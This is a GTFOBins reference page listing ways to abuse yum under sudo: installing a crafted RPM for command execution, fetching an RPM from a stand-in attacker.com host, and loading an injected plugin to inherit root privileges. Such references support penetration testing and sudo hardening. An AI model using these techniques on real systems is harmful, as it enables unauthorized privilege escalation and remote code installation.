🐚 GTFOBins / yum

yum

Command Execution

Context: sudo

yum localinstall -y x-1.0-1.noarch.rpm

Download

Context: sudo

yum install http://attacker.com/path/to/input-file.rpm

Inherit

Context: sudo

cat >/path/to/temp-dir/x<<EOF
[main]
plugins=1
pluginpath=/path/to/temp-dir/
pluginconfpath=/path/to/temp-dir/
EOF

cat >/path/to/temp-dir/y.conf<<EOF
[main]
enabled=1
EOF

cat >/path/to/temp-dir/y.py<<EOF
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  ...
EOF

yum -c /path/to/temp-dir/x --enableplugin=y